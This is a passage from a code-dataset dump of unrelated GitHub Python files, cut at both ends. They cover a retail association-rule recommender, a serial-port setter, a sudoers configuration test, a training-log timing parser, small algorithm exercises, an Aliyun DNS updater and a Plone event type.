\"POST\"]\r\n\r\n# If Invoice contains C, it means it has been canceled\r\ndf = df[~df[\"Invoice\"].str.contains(\"C\",na=False)]\r\n\r\ndf = df[df[\"Price\"] > 0]\r\ndf = df[df[\"Quantity\"] > 0]\r\n\r\ndef outlier_thresholds(dataframe, variable):\r\n    quartile1 = dataframe[variable].quantile(0.01)\r\n    quartile3 = dataframe[variable].quantile(0.99)\r\n    interquantile_range = quartile3 - quartile1\r\n    up_limit = quartile3 + 1.5 * interquantile_range\r\n    low_limit = quartile1 - 1.5 * interquantile_range\r\n    return low_limit, up_limit\r\n\r\n\r\ndef replace_with_thresholds(dataframe, variable):\r\n    low_limit, up_limit = outlier_thresholds(dataframe, variable)\r\n    # dataframe.loc[(dataframe[variable] < low_limit), variable] = low_limit\r\n    dataframe.loc[(dataframe[variable] > up_limit), variable] = up_limit\r\n\r\n\r\n\r\nreplace_with_thresholds(df, \"Price\")\r\nreplace_with_thresholds(df, \"Quantity\")\r\n\r\n######################\r\n# Preparing Data for ARL\r\n######################\r\n\r\ndf_de = df[df[\"Country\"] == \"Germany\"]\r\n\r\ndef create_invoice_product_df(dataframe, id=False):\r\n    if id:\r\n        return dataframe.groupby([\"Invoice\", \"StockCode\"])[\"Quantity\"].sum().unstack().fillna(0).applymap(lambda x:1 if x>0 else 0)\r\n    else:\r\n        return dataframe.groupby([\"Invoice\", \"Description\"])[\"Quantity\"].sum().unstack().fillna(0).applymap(lambda x:1 if x>0 else 0)\r\n\r\nfr_inv_pro_df = create_invoice_product_df(df_de, id=True)\r\n\r\ndef check_id(dataframe, stock_code):\r\n    product_name = 
dataframe[dataframe[\"StockCode\"] == stock_code][[\"Description\"]].values[0].tolist()\r\n print(product_name)\r\n\r\nfrequent_itemsets = apriori(fr_inv_pro_df,\r\n min_support=0.01,\r\n use_colnames=True)\r\n\r\nfrequent_itemsets.sort_values(\"support\",ascending=False)\r\n\r\nrules = association_rules(frequent_itemsets,\r\n metric=\"support\",\r\n min_threshold=0.01)\r\n\r\nsorted_rules = rules.sort_values(\"lift\", ascending=False)\r\n\r\ndef create_rules(dataframe):\r\n frequent_itemsets = apriori(dataframe, min_support=0.01, use_colnames=True)\r\n rules = association_rules(frequent_itemsets,\r\n metric=\"support\",\r\n min_threshold=0.01,)\r\n sorted_rules = rules.sort_values(\"lift\",ascending=False)\r\n\r\n############################\r\n# Creating arl_rules function\r\n############################\r\n\r\nproduct_id = 22629\r\nrecommendation_list = []\r\n\r\nfor i, product in enumerate(sorted_rules[\"antecedents\"]):\r\n for j in list(product):\r\n if j == product_id:\r\n recommendation_list.append(list(sorted_rules.iloc[i][\"consequents\"])[0])\r\n\r\n\r\ndef arl_recommender(sorted_dataframe, product_id, rec_count=1):\r\n recommendation_list = []\r\n for i, product in enumerate(sorted_dataframe[\"antecedents\"]):\r\n for j in list(product):\r\n if j == product_id:\r\n recommendation_list.append(list(sorted_dataframe.iloc[i][\"consequents\"])[0])\r\n\r\n return recommendation_list[0:rec_count]\r\n\r\n\r\narl_recommender(sorted_rules, 22629, 7)\r\narl_recommender(sorted_rules, 22328, 3)\r\narl_recommender(sorted_rules, 22961, 2)","repo_name":"eemredenizz/Assocating-Rules-Learning-With-Online-Retail-II-Data","sub_path":"assocating_rules_with_online_retail_II_data.py","file_name":"assocating_rules_with_online_retail_II_data.py","file_ext":"py","file_size_in_byte":4030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22815776965","text":"import os, datetime, serial, csv, time, random, signal\nimport io\nimport serial.tools.list_ports\nfrom serial import Serial\n\ndebug_mode = False\n\nif debug_mode:\n print(\"STARTING IN DEBUG MODE\")\n\nports = serial.tools.list_ports.comports()\nall_ports = []\n\nfor port, desc, hwid in sorted(ports):\n print(\"{}: {}\".format(port, desc))\n all_ports.append(\"{}: {}\".format(port, desc))\n\nprint(all_ports)\nserial_port = \"\"\nport_found = False\nfor p in all_ports:\n curr = p.lower()\n if 'usb serial' in curr:\n serial_port = p.split(':')[0]\n port_found = True\n print(\"Found STM32 device on serial port\")\n\nif not port_found and not debug_mode:\n print(\"Arduino not found! 
Ending Program\")\n # os.kill(os.getpid(), signal.SIGTERM)\n exit()\n\nelif not debug_mode:\n ser = Serial(serial_port, 9600, timeout=0)\n sio = io.TextIOWrapper(io.BufferedRWPair(ser, ser))\n\n# print(\"------------------SYNTAX------------------\")\n# print(\"|Type v_.__ to set voltage output of DAC|\")\n# print(\"|Type i_.__ to set current output of DAC|\")\n# print(\"------------------------------------------\")\n\nwhile port_found or debug_mode:\n setpoint = str(input(\"Set Setpoint: \"))\n # setpoint = int(setpoint * 1e5)\n print(setpoint)\n if setpoint == 'x':\n break\n if not debug_mode:\n sio.write(str(setpoint + 'f'))\n sio.flush()\n time.sleep(0.01)\n print(\"Data\", sio.read())\n sio.flush()\nif not debug_mode:\n ser.close()","repo_name":"josephborromeo/CellTester","sub_path":"Python/voltage_setter_test.py","file_name":"voltage_setter_test.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12541327456","text":"import os\n\nimport testinfra.utils.ansible_runner\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')\n\n\ndef test_default_packages(host):\n p = host.package('sudo')\n assert p.is_installed\n\n\ndef test_default_sudoers(host):\n f = host.file('/etc/sudoers')\n\n assert f.user == 'root'\n assert f.group == 'root'\n assert f.mode == 0o440\n\n defaults = [\n '!visiblepw',\n 'always_set_home',\n 'match_group_by_gid',\n 'always_query_group_plugin',\n 'env_reset',\n 'env_keep = \"COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS\"',\n 'env_keep += \"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\"',\n 'env_keep += \"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\"', # noqa E501\n 'env_keep += \"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\"',\n 'env_keep += \"LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\"', # noqa E501\n 'secure_path = /sbin:/bin:/usr/sbin:/usr/bin'\n ]\n for d in defaults:\n assert f.contains('Defaults ' + d)\n\n assert f.contains('root ALL=(ALL:ALL) ALL')\n\n if host.system_info.distribution == 'debian':\n assert f.contains('%sudo ALL=(ALL:ALL) ALL')\n else:\n assert f.contains('%wheel ALL=(ALL:ALL) ALL')\n\n assert f.contains('#includedir /etc/sudoers.d')\n","repo_name":"crgwilson/ansible-role-sudo","sub_path":"molecule/default/tests/test_default.py","file_name":"test_default.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12969540417","text":"from clsLocation import Location\nfrom clsCheckers import Checkers\n\nturn = input(\"What is your move? 
\")\nturnList = turn.split(\", \")\n\ncurrentRow = int(turnList[0])\ncurrentColumn = int(turnList[1])\nopponentNumber = int(turnList[2])\n\nchecker = Checkers((Location(currentRow, currentColumn)))\n\nfor count in range(3, ((opponentNumber * 2) + 3), 2):\n row = int(turnList[count])\n column = int(turnList[count+1])\n checker.addOpponentLocation(Location(row, column))\n\nchecker.jump()\nprint('%d%s' % (checker.jumps, \", KING\" if checker.king else \"\"))\n\n\n\n\n\n","repo_name":"matthewru/PythonLearning","sub_path":"ACSL/SampleProblems/Contest_2/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72267310247","text":"import re\nfrom glob import glob\n\nimport numpy as np\nimport pandas as pd\n\n\ndef logfile_to_time_df(logfile, groupfunc=None):\n \"\"\"\n Given logfile, return training times\n average_results: if True, return the average across all partitions/runs\n\n USAGE:\n logfile = \"multitask_sequential_crnn_v3_1.out\"\n df = logfile_to_time_df(logfile)\n df.to_csv(logfile + \"_time.csv\")\n\n \"\"\"\n\n # Final results (to turn into dataframe)\n final_results = []\n\n # Read logfile\n with open(logfile, \"r\") as file:\n data_raw = file.read()\n\n # Split by partitions and runs\n data = data_raw.split(\"Current partition:\")[1:]\n assert len(data) == 10, \"Error in [partition] extraction\"\n data = [i.split(\"Run # \")[1:] for i in data]\n assert pd.Series([len(i) == 10 for i in data]).all(), \"Error in [run] extraction\"\n\n # Main string parsing loop\n for partition in range(10):\n for run in range(10):\n\n # Extract train data and evaluate_best_model data\n epoch_data = data[partition][run]\n epoch_data = epoch_data.split(\"Evaluating the best model\")\n assert len(epoch_data) == 3, \"Error in [best model evaluation] extraction\"\n evaluation_data = epoch_data[2]\n train_data = epoch_data[0]\n train_data = train_data.split(\"Epoch \")[1:]\n\n # Test epoch extraction validity\n epoch_nums = [i.split(\"\\n\")[0] for i in train_data]\n epoch_n = [int(i.split(\"/\")[0]) for i in epoch_nums]\n epoch_d = [int(i.split(\"/\")[1]) for i in epoch_nums]\n assert all(\n j == i + 1 for i, j in zip(epoch_n, epoch_n[1:])\n ), \"Error in [epoch] extraction\"\n assert len(set(epoch_d)) == 1, \"Error in [epoch] extraction\"\n\n # Extract relevant data\n epoch_times = []\n val_times = []\n for epoch in train_data:\n\n # Get epoch Time\n epoch_time = [i for i in epoch.split(\"\\n\") if \"loss: \" in i]\n assert len(epoch_time) == 1, \"[loss: ] appeared more than once\"\n epoch_time = epoch_time[0].split(\" - \")[1]\n epoch_time = re.split(\"(\\d+)\", epoch_time)[1:] # Split by digits\n assert (\n len(epoch_time) == 2 and epoch_time[1] == \"s\"\n ), \"Error in [epochtime]\"\n epoch_time = int(epoch_time[0])\n epoch_times.append(epoch_time)\n\n # Get validation time\n val_time = [i for i in epoch.split(\"\\n\") if \"Validation time: \" in i]\n assert len(val_time) == 1, \"Error in [validation time] extraction\"\n val_time = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", val_time[0])\n assert len(val_time) == 1, \"Error in [validation time] extraction\"\n val_times.append(float(val_time[0]))\n\n # Get best models\n if \"Saving best model at epoch\" in epoch:\n best_model_at_epoch = int(epoch.split(\"\\n\")[0].split(\"/\")[0])\n\n # Extract final evaluation time\n final_val = [\n i for i in evaluation_data.split(\"\\n\") if \"Validation time: \" in i\n ]\n assert len(final_val) == 
1, \"Error in [final val time] extraction\"\n final_val = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", final_val[0])\n assert len(final_val) == 1, \"Error in [final val time] extraction\"\n\n # Sanity checks\n assert len(epoch_times) == len(val_times), \"Epoch times != validation times\"\n assert len(epoch_nums) == len(epoch_times), \"Epoch times != num epochs\"\n\n # Calculate all relevant times\n r = {}\n r[\"partition\"] = partition\n r[\"run\"] = run\n r[\"avg_time_per_epoch\"] = np.mean(epoch_times)\n r[\"number_of_epoch_at_best_model\"] = best_model_at_epoch\n r[\"number_of_epoch_at_finish\"] = len(epoch_nums)\n r[\"total_train_time_at_best_model\"] = np.sum(\n epoch_times[:best_model_at_epoch]\n )\n r[\"total_train_time_at_finish\"] = np.sum(epoch_times)\n r[\"total_val_time_at_best_model\"] = np.sum(val_times[:best_model_at_epoch])\n r[\"total_val_time_at_finish\"] = np.sum(val_times)\n r[\"total_time_at_best_model\"] = (\n r[\"total_train_time_at_best_model\"] + r[\"total_val_time_at_best_model\"]\n )\n r[\"total_time_at_finish\"] = (\n r[\"total_train_time_at_finish\"] + r[\"total_val_time_at_finish\"]\n )\n r[\"final_evaluation_time\"] = float(final_val[0])\n\n final_results.append(r)\n\n final_results = pd.DataFrame(final_results)\n if groupfunc:\n final_results[\"temp\"] = 1\n if groupfunc == \"mean\":\n return final_results.groupby(\"temp\").mean().reset_index(drop=True)\n elif groupfunc == \"sum\":\n return final_results.groupby(\"temp\").sum().reset_index(drop=True)\n else:\n raise Exception(\"groupby: 'mean' or 'sum'\")\n return final_results\n","repo_name":"lhmtriet/DeepCVA","sub_path":"helpers/extract_logfile_time.py","file_name":"extract_logfile_time.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"3126488853","text":"# -*- coding: utf-8 -*-\n# @File : move_zeroes.py\n# @Author: clelandgt@163.com\n# @Date : 2020-07-01\n# @Desc :\nfrom typing import List\nfrom copy import copy, deepcopy\n\n\nclass Solution1:\n def moveZeroes(self, nums: List[int]) -> None:\n nums.sort(key=lambda x: 1 if x == 0 else 0)\n\n\nclass Solution2:\n \"\"\"双指针 正向\n 时间复杂度: O(n)\n 空间复杂度: O(1)\n \"\"\"\n def moveZeroes(self, nums: List[int]) -> None:\n not_null_index = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[not_null_index], nums[i] = nums[i], nums[not_null_index]\n not_null_index += 1\n\n\nclass Solution3:\n \"\"\"双指针 逆向 (错误),因为要保持非0元素的位置不变\n 时间复杂度: O(n)\n 空间复杂度: O(1)\n \"\"\"\n def moveZeroes(self, nums: List[int]) -> None:\n index, size, zero = 0, len(nums), len(nums)\n while index < zero:\n if nums[index] == 0:\n zero -= 1\n nums[index], nums[zero] = nums[zero], nums[index]\n index += 1\n return nums\n\n\ndef main():\n test_cases = [\n [0, 1, 0, 3, 12]\n ]\n\n print('Solution1')\n s1 = Solution1()\n for test_case in test_cases:\n test_case = deepcopy(test_case)\n s1.moveZeroes(test_case)\n print(test_case)\n\n print('Solution2')\n s2 = Solution2()\n for test_case in test_cases:\n test_case = deepcopy(test_case)\n s2.moveZeroes(test_case)\n print(test_case)\n\n print('Solution3')\n s3 = Solution3()\n for test_case in test_cases:\n test_case = deepcopy(test_case)\n s3.moveZeroes(test_case)\n print(test_case)\n\n\nif __name__ == '__main__':\n 
main()\n\n","repo_name":"clelandgt/arithmetic","sub_path":"leetcode/283/move_zeroes.py","file_name":"move_zeroes.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38821809696","text":"\nfrom torchvision import transforms, datasets\nimport torch\n\ndef get_dataloaders():\n    ALL_DATA_DIR = '../datasets/01_FER2013_datasets/'\n    train_dir = ALL_DATA_DIR + 'train'\n    test_dir = ALL_DATA_DIR + 'test'\n    batch_size = 128\n    IMG_SIZE= 48# 300 # 80 #\n    train_transforms = transforms.Compose(\n        [\n            transforms.Resize((IMG_SIZE,IMG_SIZE)),\n            transforms.ToTensor(),\n            transforms.Normalize(mean=[0.485, 0.456, 0.406],\n                                 std=[0.229, 0.224, 0.225])\n        ]\n    )\n\n    test_transforms = transforms.Compose(\n        [\n            transforms.Resize((IMG_SIZE,IMG_SIZE)),\n            transforms.Grayscale(3),\n            transforms.ToTensor(),\n            transforms.Normalize(mean=[0.485, 0.456, 0.406],\n                                 std=[0.229, 0.224, 0.225])\n        ]\n    )\n    \n    use_cuda = torch.cuda.is_available()\n    kwargs = {'num_workers': 4, 'pin_memory': True} if use_cuda else {}\n    train_dataset = datasets.ImageFolder(root=train_dir, transform=train_transforms)\n    train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=True, **kwargs)\n    test_dataset = datasets.ImageFolder(root=test_dir, transform=test_transforms)\n    test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False, **kwargs) \n    return train_loader, test_loader","repo_name":"VietHung-CHV/Emotion_Recognition","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42633144202","text":"# -*- coding: utf-8 -*-\r\n\r\nimport os\r\nimport json\r\nfrom urllib import request\r\nfrom aliyunsdkcore.client import AcsClient\r\nfrom aliyunsdkcore.acs_exception.exceptions import ClientException\r\nfrom aliyunsdkcore.acs_exception.exceptions import ServerException\r\nfrom aliyunsdkalidns.request.v20150109 import DescribeDomainRecordsRequest\r\nfrom aliyunsdkalidns.request.v20150109 import UpdateDomainRecordRequest\r\nimport LibWaakii.IpInfo as IpInfo\r\nfrom LibWaakii import WordsCheck\r\n\r\nclass DNSWorker(object):\r\n    # Aliyun Access_Key_Id and Access_Key_Secret\r\n    access_key_id = \"\"\r\n    access_key_secret = \"\"\r\n    region_id = \"\"\r\n    # The domain name currently being operated on\r\n    domain_name = \"\"\r\n\r\n    # DNS record type, usually an A record\r\n    record_type = \"A\"\r\n    # Path and name of the config file\r\n    config_file = \"\"\r\n\r\n    client = None\r\n    record = None\r\n    current_ip = ''\r\n\r\n    # Initialise and obtain the AcsClient instance\r\n    def __init__(self,domain_name,access_key_id,access_key_secret,region_id = 'region_id'):\r\n        self.access_key_id = access_key_id\r\n        self.access_key_secret = access_key_secret\r\n        self.region_id = region_id\r\n        self.domain_name = domain_name\r\n        \r\n        try:\r\n            self.client = AcsClient(\r\n                self.access_key_id,\r\n                self.access_key_secret,\r\n                self.region_id\r\n            )\r\n            self.record = self.getAliyunDnsRecord()\r\n        except Exception as e:\r\n            print(e)\r\n            self.record = None\r\n\r\n    def getAliyunDnsRecord(self):\r\n        try:\r\n            request = DescribeDomainRecordsRequest.DescribeDomainRecordsRequest()\r\n            request.set_PageSize(99)\r\n            request.set_PageNumber(1)\r\n            request.set_action_name(\"DescribeDomainRecords\")\r\n            request.set_DomainName(self.domain_name)\r\n            # request.set_RRKeyWord(self.rr_keyword)\r\n            request.set_TypeKeyWord(self.record_type)\r\n            r = self.client.do_action_with_exception(request)\r\n            return json.loads(r.decode('utf-8'))\r\n        except Exception as e:\r\n            print(e)\r\n            return None\r\n\r\n    # Get all Aliyun DNS resolution records\r\n    def get_record_all(self) :\r\n        if 
self.record is not None:\r\n            return self.record[\"DomainRecords\"][\"Record\"]\r\n        else:\r\n            return None\r\n\r\n    # Get the details of a DNS record\r\n    def get_record_value(self,RR = '@') :\r\n        try:\r\n            for dicRecord in self.record[\"DomainRecords\"][\"Record\"]:\r\n                if RR == dicRecord['RR']:\r\n                    return dicRecord\r\n            return {}\r\n        except:\r\n            return None\r\n\r\n    # Get the recordid of a DNS record\r\n    def get_record_id(self,RR = '@') :\r\n\r\n        try:\r\n            return self.get_record_value(RR)['RecordId']\r\n        except:\r\n            return None\r\n    \r\n    # Update an Aliyun DNS record\r\n    def update_record(self, RR ,value):\r\n        request = UpdateDomainRecordRequest.UpdateDomainRecordRequest()\r\n        request.set_action_name(\"UpdateDomainRecord\")\r\n        request.set_accept_format('json')\r\n        request.set_TTL('600')\r\n        sRecordid = self.get_record_id(RR)\r\n\r\n        if sRecordid is not None and WordsCheck.RegexChecker.judgeLegalIpv4(value):\r\n            request.set_RecordId(sRecordid)\r\n            request.set_Type(self.record_type)\r\n            request.set_RR(RR)\r\n            request.set_Value(value)\r\n        else:\r\n            return False\r\n        try:\r\n            # jsonReturn = json.load(self.client.do_action_with_exception(request))\r\n            # rc = self.client.do_action_with_exception(request)\r\n            if json.loads(self.client.do_action_with_exception(request).decode('utf-8')) is not None:\r\n                return True\r\n        except:\r\n            return False\r\n    \r\n","repo_name":"jeffreyshou7/Py-AliyunDDNS-Service","sub_path":"LibWaakii/AliYunDns.py","file_name":"AliYunDns.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"73030005929","text":"import sys\ninput = sys.stdin.readline\n\nn, c = map(int, input().split())\narr = [int(input()) for _ in range(n)]\narr.sort()\n\nlow, high = 1, arr[-1] - arr[0]\nmid = 0\nresult = 0\n\nwhile low <= high:\n    mid = (low+high) // 2\n    idx = 0\n    cnt = 1\n    for i in range(1, len(arr)):\n        if arr[i] >= arr[idx] + mid:\n            cnt += 1\n            idx = i\n    if cnt >= c:\n        result = mid\n        low = mid + 1\n    else:\n        high = mid - 1\n\nprint(result)\n","repo_name":"CHOSIYEON/Algorithms","sub_path":"BAEKJOON/Binary Search/record/2110.py","file_name":"2110.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23217829856","text":"# Source: https://www.acmicpc.net/problem/17389\n# Problem: bonus points\n\n\n_ = input()\n\nbonus = 0\nresult = 0\nfor i, ox in enumerate(input()):\n    if ox == \"O\":\n        result += i + 1 + bonus\n        bonus += 1\n    else:\n        bonus = 0\n\nprint(result)\n","repo_name":"mozzieongit/Bike-Project","sub_path":"boj/prob17389.py","file_name":"prob17389.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29910627754","text":"# -*- coding: utf-8 -*-\n# $Id: event.py 388 2009-06-13 09:32:31Z ajung $\n\n\n\nfrom AccessControl import ClassSecurityInfo\nfrom zope.interface import implements\n\nfrom DateTime.DateTime import DateTime\nfrom Products.ATContentTypes.content.event import ATEvent\nfrom Products.ATContentTypes.content.schemata import finalizeATCTSchema\nfrom Products.DataGridField import DataGridField, DataGridWidget\nfrom Products.DataGridField.Column import Column\nfrom Products.DataGridField.SelectColumn import SelectColumn\nfrom Products.DataGridField.CheckboxColumn import CheckboxColumn\n\nfrom Products.CMFCore.permissions import View\nfrom archetypes.referencebrowserwidget.widget import ReferenceBrowserWidget\nfrom dateutil.rrule import YEARLY, MONTHLY, WEEKLY, DAILY\n\nfrom vs.event.config import *\nfrom vs.event.interfaces import IVSEvent, 
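IVSSubEvent\n# editor's note (hedged sketch): the recurrence schema below stores dateutil.rrule frequency constants (YEARLY/MONTHLY/WEEKLY/DAILY) as strings; such a stored value expands into concrete dates roughly like this, with the dtstart and count values invented for illustration:\n#     from datetime import datetime\n#     from dateutil.rrule import rrule  # only the frequency constants are imported above\n#     list(rrule(WEEKLY, dtstart=datetime(2009, 6, 1), interval=1, count=3))\n#     # -> 2009-06-01, 2009-06-08, 2009-06-15\nfrom vs.event.interfaces import IVSEvent, 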
IVSSubEvent\nfrom vs.event import MessageFactory as _\nfrom vs.event import validators\nfrom collective.calendarwidget.widget import CalendarWidget\nimport event_util\n\ntry:\n from Products.LinguaPlone import public as atapi\nexcept ImportError:\n from Products.Archetypes import atapi\n\n\nfrom logging import getLogger\nlog = getLogger(\">> event : \")\n\nVSEventSchema = atapi.Schema((\n\n atapi.ReferenceField(\n name='subEvents',\n allowed_types=('VSSubEvent',),\n multiValued=True,\n relationship='isSubEvent',\n widget=ReferenceBrowserWidget(\n visible={'view': 'invisible', 'edit':'invisible'},\n ),\n ),\n atapi.LinesField(\n name='weekdays',\n schemata='recurrence',\n vocabulary=atapi.DisplayList((\n ('0', _(u'vs_label_mo', 'Monday')),\n ('1', _(u'vs_label_di', 'Tuesday')),\n ('2', _(u'vs_label_mi', 'Wednesday')),\n ('3', _(u'vs_label_do', 'Thursday')),\n ('4', _(u'vs_label_fr', 'Friday')),\n ('5', _(u'vs_label_sa', 'Saturday')),\n ('6', _(u'vs_label_so', 'Sunday'))\n )),\n widget=atapi.MultiSelectionWidget(\n format=\"checkbox\",\n label=_(u'vs_event_label_weekdays', 'Weekdays'),\n description=_(u'vs_event_help_weekdays', 'Select weekdays'),\n ),\n ),\n atapi.StringField(\n name='bysetpos',\n schemata='recurrence',\n validators=('isLineOfInts',),\n widget=atapi.StringWidget(\n label=_(u'vs_event_label_bysetpos', 'Occurrence'),\n description=_(u'vs_event_help_bysetpos', 'Comma separated list of '\n 'numbers. If this event is on first and third '\n 'Monday of the month, enter \"1,3\" and select '\n 'appropriate day of the week above. For the last '\n 'day of the month, enter \"-1\", select Monday '\n 'through Friday above and monthly recurrence.'),\n ),\n ),\n atapi.LinesField(\n name='exceptions',\n schemata='recurrence',\n validators=('linesOfDates',),\n widget=atapi.LinesWidget(\n label=_(u'vs_event_label_exceptions', 'Exceptions'),\n description=_(u'vs_event_help_exceptions', 'Please enter exceptions to recurrence. 
One date per line in format YYYY-MM-DD'),\n ),\n ),\n\n atapi.IntegerField('frequency',\n schemata=\"recurrence\",\n required=True,\n i18n_domain = \"vs.event\",\n vocabulary={str(-1): _(u'Does not repeat'),\n str(YEARLY): _(u'Yearly'),\n str(MONTHLY): _(u'Monthly'),\n str(WEEKLY): _(u'Weekly'),\n str(DAILY): _(u'Daily'),\n }.items(),\n default=-1,\n widget=atapi.SelectionWidget(label=_(u\"vs_event_label_frequency\", 'Frequency'),\n )\n ),\n atapi.IntegerField('interval',\n schemata=\"recurrence\",\n required=True,\n default=1,\n widget=atapi.IntegerWidget(label=_(u\"vs_event_label_interval\", 'Interval'),\n )\n ),\n atapi.DateTimeField('until',\n schemata=\"recurrence\",\n widget=CalendarWidget(label=_(u\"vs_event_label_repeat_until\", \"Repeat until\"),\n description=_(u\"vs_event_description_repeat__until\", \"Event repeats until this date.\"),\n with_time=1)\n ),\n atapi.IntegerField('count',\n schemata=\"recurrence\",\n widget=atapi.IntegerWidget(label=_(u\"vs_event_label_count\", 'Count'),\n description=_(u\"vs_event_description_count\", \"Maxinum number of times the event repeats\"),\n )\n ),\n\n))\n\nVSEventSchema = VSEventSchema + ATEvent.schema.copy()\nfinalizeATCTSchema(VSEventSchema, folderish=False, moveDiscussion=True)\n\n\ndef modifyEventSchema(schema):\n schema.addField(atapi.BooleanField('wholeDay',\n widget=atapi.BooleanWidget(\n label=_(u'label_whole_day_event', 'Whole day event'),\n ),\n ))\n schema.addField(atapi.BooleanField('useEndDate',\n default=True,\n widget=atapi.BooleanWidget(\n label=_(u'label_use_end_date', 'Use end date?'),\n ),\n ))\n schema.moveField('wholeDay', before='startDate')\n schema.moveField('useEndDate', after='wholeDay')\n schema['startDate'].widget = CalendarWidget(label=_(u\"label_event_start\", \"Event Starts\"),\n with_time=1,\n with_popup=1,\n js_shortcuts=0,\n ignore_unset_time=1)\n\n schema['endDate'].widget = CalendarWidget(label = _(u\"label_event_end\", \"Event Ends\"),\n with_time=1,\n with_popup=1,\n js_shortcuts=0,\n ignore_unset_time=1)\n\n del schema['until']\n schema.addField(atapi.DateTimeField('until',\n schemata='recurrence',\n widget=CalendarWidget(description=_(u\"vs_repeat_events_until_date\", \"Event repeats until this date\"),\n label=_(u\"vs_label_repeat_until\", \"Repeat until\"),\n with_time=1)))\n\n schema.addField(atapi.ReferenceField(name='attachments',\n allowed_types=('Link','File'),\n multiValued=1,\n relationship='aAttachment',\n widget=ReferenceBrowserWidget(\n show_review_state=1,\n allow_sorting=1,\n force_close_on_insert=1,\n base_query = {'Type':['Link','File']},\n label=_(u'vs_event_label_attachments', 'Attachments'),\n ),\n ))\n\n del schema['attendees']\n schema.addField(DataGridField(name=\"attendees\",\n columns=('name', 'mail','role', 'show'),\n schemata='attendees',\n widget = DataGridWidget(\n label=_(u'vs_event_label_roleAttendees', \"Attendees and roles\"),\n columns={\n 'name': Column(_(u'vs_event_label_nameColumn', \"Name\")),\n 'mail': Column(_(u'vs_event_label_mailColumn', \"e-Mail\")),\n 'role': SelectColumn(_(u'vs_event_label_roleColumn', \"Role\"), vocabulary='getAttendeeRoles'),\n 'show': CheckboxColumn(_(u'vs_event_label_showColumn', \"Show\")),\n }),\n ))\n schema.moveField('attendees', after='count')\n return schema\n\nclass VSEvent(ATEvent):\n \"\"\" vs.event \"\"\"\n\n security = ClassSecurityInfo()\n implements(IVSEvent)\n meta_type = 'VSEvent'\n _at_rename_after_creation = True\n schema = modifyEventSchema(VSEventSchema)\n\n security.declareProtected(View, 'getICal')\n def 
getICal(self):\n \"\"\"get iCal data \"\"\"\n return event_util.getICal(self)\n\n security.declareProtected(View, 'getVCal')\n def getVCal(self):\n \"\"\"get VCal data \"\"\"\n return event_util.getVCal(self)\n\n\n def at_post_edit_script(self):\n \"\"\" Ensure that for single-day dates without an end date\n the end date is equal to the start date.\n \"\"\"\n\n self.setExcludeFromNav(True)\n\n if not self.getUseEndDate():\n self.setEndDate(self.start())\n\n if self.getWholeDay():\n self.setStartDate(DateTime(self.start().strftime('%Y/%m/%d 00:00:00')))\n self.setEndDate(DateTime(self.end().strftime('%Y/%m/%d 23:59:00')))\n\n def getAttendeeRoles(self):\n \"\"\" \"\"\"\n return atapi.DisplayList((\n ('chair',_(u'vs_event_label_chair', \"Chair\")),\n ('observer',_(u'vs_event_label_observer', \"Observer\")),\n ('participant',_(u'vs_event_label_participant', \"Participant\")),\n ('opt_participant',_(u'vs_event_label_opt_participant', \"Optional participant\")),\n ))\n\n security.declareProtected(View, 'post_validate')\n def post_validate(self, REQUEST=None, errors=None):\n \"\"\" Trigger original ATEvent.post_validate_method() for\n dates having an end date.\n \"\"\"\n if REQUEST.get('useEndDate', True) == True:\n return super(VSEvent, self).post_validate(REQUEST=REQUEST,\n errors=errors)\n\natapi.registerType(VSEvent, PROJECTNAME)\n\n\ndef modifySubEventSchema(schema):\n # remove unwanted fields for subevents\n\n # PLONE 4 seems not to have a eventType field anymore, so it must be\n # excluded here for compatibility\n for id in ('attendees', 'contactName', 'contactEmail', 'contactPhone', 'eventUrl'):\n schema[id].widget.visible = False\n for field in schema.fields():\n if field.schemata in ('dates', 'categorization', 'ownership', 'settings'):\n field.widget.visible = False\n\n schema.addField(atapi.BooleanField('wholeDay',\n default=False,\n widget=atapi.BooleanWidget(\n label=_(u'label_whole_day_event', 'Whole day event'),\n ),\n ))\n schema.addField(atapi.BooleanField('useEndDate',\n default=True,\n widget=atapi.BooleanWidget(\n label=_(u'label_use_end_date', 'Use end date?'),\n ),\n ))\n schema.moveField('wholeDay', before='startDate')\n schema.moveField('useEndDate', after='wholeDay')\n\n schema['startDate'].widget = CalendarWidget(label=_(u\"label_event_start\", \"Event 